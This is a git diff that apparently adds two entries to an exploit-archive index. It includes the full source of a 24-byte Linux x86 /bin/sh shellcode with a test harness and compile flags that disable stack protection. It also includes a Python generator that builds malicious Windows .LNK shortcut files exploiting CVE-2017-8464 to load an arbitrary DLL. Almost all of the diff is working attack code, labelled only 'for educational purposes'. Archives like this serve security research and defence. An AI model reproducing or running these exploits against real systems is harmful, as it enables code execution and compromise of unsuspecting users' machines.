diff --git a/files.csv b/files.csv index f8d963b58..b7fda7a1f 100644 --- a/files.csv +++ b/files.csv @@ -9173,6 +9173,7 @@ id,file,description,date,author,platform,type,port 42424,platforms/linux/local/42424.py,"DNSTracer 1.9 - Buffer Overflow",2017-08-03,j0lama,linux,local,0 42425,platforms/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0 42426,platforms/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0 +42429,platforms/windows/local/42429.py,"Microsoft Windows - LNK Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -16372,6 +16373,7 @@ id,file,description,date,author,platform,type,port 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0 42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0 +42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 diff --git a/platforms/lin_x86/shellcode/42428.c b/platforms/lin_x86/shellcode/42428.c new file mode 100755 index 000000000..390e4fa04 --- /dev/null +++ b/platforms/lin_x86/shellcode/42428.c @@ -0,0 +1,65 @@ +/* +;Title: Linux/x86 - /bin/sh Shellcode +;Author: Touhid M.Shaikh +;Contact: https://github.com/touhidshaikh +;Category: Shellcode +;Architecture: Linux x86 +;Description: This shellcode baased on stack method to Execute "/bin//sh". +Length of shellcode is 24 bytes. +;Tested on : 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 + + + +===COMPILATION AND EXECUTION=== + +#nasm -f elf32 shell.asm -o shell.o <=== Making Object File + +#ld -m elf_i386 shell.o -o shell <=== Making Binary File + +#./bin2shell.sh shell <== xtract hex code from the binary( +https://github.com/touhidshaikh/bin2shell) + + + +=================SHELLCODE(INTEL FORMAT)================= + +section .text +global _start +_start: +xor eax,eax +cdq +push eax +push 0x68732f2f +push 0x6e69622f +mov ebx,esp +push eax +push ebx +mov ecx, esp +mov al,0x0b +int 80h + +===================END HERE============================ + +Compile with gcc with some options. + +# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing + +*/ + +#include +#include + + +unsigned char code[] = \ +"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + +printf("Shellcode Length: %d\n", (int)strlen(code)); + +int (*ret)() = (int(*)())code; + +ret(); + +} diff --git a/platforms/windows/local/42429.py b/platforms/windows/local/42429.py new file mode 100755 index 000000000..6da81e2b0 --- /dev/null +++ b/platforms/windows/local/42429.py @@ -0,0 +1,245 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- + +# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability +# CVE : 2017-8464 +# Authors : [ykoster, nixawk] +# Notice : Only for educational purposes. +# Support : python2 + +import struct + + +def generate_SHELL_LINK_HEADER(): + # _________________________________________________________________ + # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | + # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1| + # ----------------------------------------------------------------- + # | HeaderSize | + # ----------------------------------------------------------------- + # | LinkCLSID (16 bytes) | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | LinkFlags | + # ----------------------------------------------------------------- + # | FileAttributes | + # ----------------------------------------------------------------- + # | CreationTime | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | AccessTime | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | WriteTime | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + # | FileSize | + # ----------------------------------------------------------------- + # | IconIndex | + # ----------------------------------------------------------------- + # | ShowCommand | + # ----------------------------------------------------------------- + # | HotKey | Reserved1 | + # ----------------------------------------------------------------- + # | Reserved2 | + # ----------------------------------------------------------------- + # | Reserved3 | + # ----------------------------------------------------------------- + + shell_link_header = [ + b'\x4c\x00\x00\x00', # "HeaderSize" : (4 bytes) + b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46', # "LinkCLSID" : (16 bytes) HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046} + b'\x81\x00\x00\x00', # "LinkFlags" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode + b'\x00\x00\x00\x00', # "FileAttributes" : (4 bytes) + b'\x00\x00\x00\x00\x00\x00\x00\x00', # "CreationTime" : (8 bytes) + b'\x00\x00\x00\x00\x00\x00\x00\x00', # "AccessTime" : (8 bytes) + b'\x00\x00\x00\x00\x00\x00\x00\x00', # "WriteTime" : (8 bytes) + b'\x00\x00\x00\x00', # "FileSize" : (4 bytes) + b'\x00\x00\x00\x00', # "IconIndex" : (4 bytes) + b'\x00\x00\x00\x00', # "ShowCommand" : (4 bytes) + b'\x00\x00', # "HotKey" : (2 bytes) + b'\x00\x00', # "Reserved1" : (2 bytes) + b'\x00\x00\x00\x00', # "Reserved2" : (4 bytes) + b'\x00\x00\x00\x00', # "Reserved3" : (4 bytes) + ] + + return b"".join(shell_link_header) + + +def generate_LINKTARGET_IDLIST(path, name): + # _________________________________________________________________ + # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | + # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1| + # ----------------------------------------------------------------- + # | IDListSize | IDList(variable) | + # ----------------------------------------------------------------- + # | ... | + # ----------------------------------------------------------------- + + # IDList = ItemID + ItemID + ... + TerminalID + # ItemID = ItemIDSize + Data + + def generate_ItemID(Data): + itemid = [ + struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data) + Data + ] + # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data) + + # return ItemIDSize + Data + + return b"".join(itemid) + + def generate_cpl_applet(path, name=name): + name += b'\x00' + path += b'\x00' + + bindata = [ + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00', + struct.pack('H', len(path)), + struct.pack('H', len(name)), + path.encode('utf-16')[2:], + name.encode('utf-16')[2:], + b"\x00\x00" # comment + ] + + return b"".join(bindata) + + idlist = [ + # ItemIDList + + generate_ItemID(b'\x1f\x50\xe0\x4f\xd0\x20\xea\x3a\x69\x10\xa2\xd8\x08\x00\x2b\x30\x30\x9d'), + generate_ItemID(b'\x2e\x80\x20\x20\xec\x21\xea\x3a\x69\x10\xa2\xdd\x08\x00\x2b\x30\x30\x9d'), + generate_ItemID(generate_cpl_applet(path)), + + b'\x00\x00', # TerminalID + ] + + idlist = b"".join(idlist) + idlistsize = struct.pack('H', len(idlist)) + + linktarget_idlist = [ + idlistsize, + idlist, + ] + + return b"".join(linktarget_idlist) + + +def generate_EXTRA_DATA(): + # ExtraData refers to a set of structures that convey additional information about a link target. These + # optional structures can be present in an extra data section that is appended to the basic Shell Link + # Binary File Format. + + # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK + + # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS / + # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS / + # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS / + # SHIM_PROPS / SPECIAL_FOLDER_PROPS / + # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS + + # SpecialFolderDataBlock + + # _________________________________________________________________ + # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | + # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1| + # ----------------------------------------------------------------- + # | BlockSize | + # ----------------------------------------------------------------- + # | BlockSignatire | + # ----------------------------------------------------------------- + # | SpecialFolderID | + # ----------------------------------------------------------------- + # | Offset | + # ----------------------------------------------------------------- + + extra_data = [ + b'\x10\x00\x00\x00', + b'\x05\x00\x00\xA0', + b'\x03\x00\x00\x00', + b'\x28\x00\x00\x00', + b'\x00\x00\x00\x00' # TERMINAL_BLOCK + ] + + return b"".join(extra_data) + + +def ms_shllink(path, name=b"Microsoft"): + '''build Shell Link (.LNK) Binary File Format''' + + lnk_format = [ + + # Structures + + # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO] + # [STRING_DATA] *EXTRA_DATA + + + # SHELL_LINK_HEADER: + # A ShelllinkHeader structure which contains identification information, timestamps, and + # flags that specify the presence of optional structures. + + generate_SHELL_LINK_HEADER(), + + # LINKTARGET_IDLIST: + # An optional LinkTargetIDList structure, which specifies the target of the link. The + # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader. + # + # + + generate_LINKTARGET_IDLIST(path, name), + + # LINKINFO: + # An optional LinkInfo structure, which specifies information necessary to resolve the link target. + # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader. + + # STRING_DATA: + # Zero or more optional StringData structures, which are used to convey user interface and path + # identification information. The presence of these structures is specified by bits in the ShellLinkHeader. + + # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR] + # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION] + + # EXTRA_DATA: + # Zero or more ExtraData structures + + generate_EXTRA_DATA() + ] + + return b"".join(lnk_format) + + +if __name__ == '__main__': + import sys + + if len(sys.argv) != 3: + print("[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability") + print("[*] Usage: %s " % sys.argv[0]) + sys.exit(0) + + lnkpath = sys.argv[1] + dllpath = sys.argv[2] + + bindata = ms_shllink(path=dllpath) + + with open(lnkpath, 'wb') as lnkf: + lnkf.write(bindata) + + +## References + +# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464 +# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx +# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf +# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf +# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files +# 6. https://twitter.com/mkolsek/status/877499744704237568 +# 7. https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g +# 8. https://github.com/rapid7/metasploit-framework/pull/8767 \ No newline at end of file